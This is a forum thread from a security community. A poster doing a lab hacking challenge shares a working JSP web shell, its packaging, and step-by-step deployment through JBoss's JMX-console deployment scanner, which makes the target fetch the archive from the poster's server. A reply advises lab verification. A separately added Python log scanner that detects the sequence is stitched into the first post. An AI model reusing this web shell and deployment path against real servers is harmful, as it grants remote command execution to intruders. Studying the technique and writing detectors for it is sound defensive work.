breaking jboss with a browser? not happening



#1 yberfreak

yberfreak

    Will I break 10 posts?

  • Members
  • 8 posts
  • Gender:Male

Posted 14 January 2011 - 02:30 PM

I have been given a task to break into a JBoss application by my senior security manager at my company. It's a hacking challenge staged in a test lab. This is what I have been given: web access to JBoss. Yes, that's pretty much it <3. He believes in a less-is-more philosophy, with some "get to it and start working" info. I have been told that a vulnerability exists in the application and it's no 0-day exploit; it's a known vulnerability. It is set as an open-book challenge: I can get help anywhere I like. So what did I do so far?

Yes, I googled; but I also ran a Nessus scan and the scan brought me one HIGH vulnerability. It has to do with the default JBoss installation using the JMX-Console. It's not a new vulnerability; I was able to reach this conclusion as I started googling. This particular vulnerability is very popular; I was saying to myself that my problems are over and I would break into JBoss in record time. But that has been largely untrue. Why? Well, if it wasn't true I wouldn't be here. I did the following (in steps):


Attack vector: deployment scanner feature

1. Confirmed the default installation (by accessing localhost:9090); in my case it's 9090, not 8080 as in the hacking literature. Probably this is because I'm using a new version (I don't know the exact reason).

2. I wrote this JSP script (cmd.jsp) as told on the sites:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>



3. Next I created a web.xml file to be placed in the WEB-INF folder:



<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/20...chema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
    http://java.sun.com/...eb-app_2_4.xsd"
    version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>



4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF folder:



jar cvf cmd.war WEB-INF cmd.jsp



5. I put this file on the Apache HTTP server. The file cmd.war resides in the htdocs folder and can be accessed by the URL mywebserver:80/cmd.war.

6. I go back to the JBoss default page and navigate to the jboss.deployment page.

7. In the addURL tab I enter the path for my cmd.war file as

http://mywebserver/cmd.war

8. Next I go to the victim web server in an attempt to access my uploaded application: http://victim:9090/cmd/cmd.jsp

9. I get HTTP STATUS 404 - /cmd/cmd.jsp

My app is supposed to be hot-deployed by JBoss, but this is not the case, because even after accessing the file 10-20 times I get the same error page. I want to know what the reason for this behavior is. I know there exist other attack vectors (e.g. RMI etc.) but I want to stick to this one until I figure out the reason for this failure of the exploit.

Am I compiling the .jsp file with incorrect syntax? Do I need to have a Tomcat server installed instead? I read on the internet that there could be some problems with JBoss trying to get a reverse shell to your web server, as JBoss works in bind-shell mode only? I'm really clueless as to what is happening; I spent 12 works on this single attack vector but I'm not making headway.

JBoss gurus, help me.

Thanks
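The deployment path walked through above leaves a recognisable trail in the HTTP access log: console hits from a client that is not an administrator, an inspect of the deployment-scanner MBean, a POST to the HtmlAdaptor, and then a request for a context nobody deployed on purpose. The following is an added example from the defender's side and is not part of the original post or of JBoss itself: a small Python scanner that runs over combined-format access-log lines and flags exactly that sequence. The log lines, the admin network (10.0.0.0/24) and the list of known application roots are constructed for the example; the context roots (/jmx-console, /web-console, /invoker/) and the MBean name jboss.deployment:type=DeploymentScanner,flavor=URL are the stock JBoss AS 4.x defaults as I know them and are assumed unchanged.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format access-log line as written by Apache httpd or JBoss' AccessLogValve.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Context roots of the management interfaces a stock JBoss AS 4.x install exposes
# (assumption: the defaults were not renamed).
MGMT_PREFIXES = ("/jmx-console", "/web-console", "/invoker/")
# MBean domain behind the "jboss.deployment page" the thread refers to (assumption).
DEPLOY_DOMAIN = "jboss.deployment"
# Constructed for this example: who may administer, and which apps are known to exist.
ADMIN_NETS = ("10.0.0.",)
KNOWN_ROOTS = ("/index.html", "/shop/")

# Constructed sample log; client 203.0.113.7 walks the path described in the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jan/2011:14:30:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 3512',
    '203.0.113.7 - - [14/Jan/2011:14:30:22 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean'
    '&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 8122',
    '203.0.113.7 - - [14/Jan/2011:14:30:40 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Jan/2011:14:31:05 +0000] "GET /cmd/cmd.jsp HTTP/1.1" 404 1044',
    '10.0.0.5 - - [14/Jan/2011:15:00:00 +0000] "GET /jmx-console/ HTTP/1.1" 200 3512',
    '10.0.0.5 - - [14/Jan/2011:15:00:30 +0000] "GET /shop/cart.jsp HTTP/1.1" 200 2048',
    '198.51.100.9 - - [14/Jan/2011:15:10:00 +0000] "GET /index.html HTTP/1.1" 200 100',
]


def parse(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_known_app(path):
    """True for the site root and for any path under a context we know was deployed."""
    return path == "/" or path.startswith(KNOWN_ROOTS)


def analyse(lines):
    """Return (ip, reason, target) findings for console use and deployment-scanner activity."""
    findings = []
    console_users = set()  # clients that have touched a management interface so far
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, target = rec["ip"], rec["target"]
        url = urlsplit(target)
        query = parse_qs(url.query)
        action = query.get("action", [""])[0]
        mbean = query.get("name", [""])[0]

        if url.path.startswith(MGMT_PREFIXES):
            console_users.add(ip)
            if not ip.startswith(ADMIN_NETS):
                findings.append((ip, "management interface reached from outside the admin network", target))
            if action in ("invokeOp", "invokeOpByName"):
                findings.append((ip, "MBean operation invoked through the JMX console", target))
            if mbean.startswith(DEPLOY_DOMAIN):
                findings.append((ip, "deployment scanner MBean inspected", target))
            if rec["method"] == "POST" and url.path.endswith("/HtmlAdaptor"):
                findings.append((ip, "POST to HtmlAdaptor (operation invocation; arguments are not logged)", target))
        elif ip in console_users and not is_known_app(url.path):
            # The same client asks for a context nobody deployed on purpose right after
            # using the console: the "did my archive come up?" check, whether it got 404 or 200.
            findings.append((ip, f"unknown context requested after console use (HTTP {rec['status']})", target))
    return findings


if __name__ == "__main__":
    for ip, reason, target in analyse(SAMPLE_LOG):
        print(f"{ip:15} {reason}: {target}")
```

Run against the sample, the script reports six findings, all for 203.0.113.7, and nothing for the administrator on 10.0.0.5 or the ordinary visitor. The "unknown context" rule is the one worth keeping even when the console is already locked down: it fires on the follow-up probe (here the 404 on /cmd/cmd.jsp) regardless of which management path was used to attempt the deployment.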

#2 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 20 January 2011 - 02:46 PM

Why don't you set up a vulnerable JBoss server in your own lab, and verify your JAR and attack procedure work against a known weak target?
If it does, then they have patched the vuln or configured it to mitigate the vector away. Then you can move on to the RMI and other vectors. Nessus is full of false positives like that and part of the skill of driving it is to know how to pick the NASL script apart and verify the results, rather than just printing some management summary off and calling it done. It's not because Nessus is terrible; it is because it relies on banner versions and other information for identification and sometimes a patch doesn't uplift the version number. Some vendors have forked some ancient codebase from BSD or the like back in the mists of time and never uplifted the version number, so Nessus reports "OMG you can get root with telnet ~@" or the like when it does nothing of the sort.

I quite often do full installs of things I am interested in so I can look around and test things and see how they work without ruffling any feathers. And I always go through Nessus scans verifying stuff by hand when it matters.

Edited by phaedrus, 20 January 2011 - 02:50 PM.
BinRev is hosted by the great people at Lunarpages!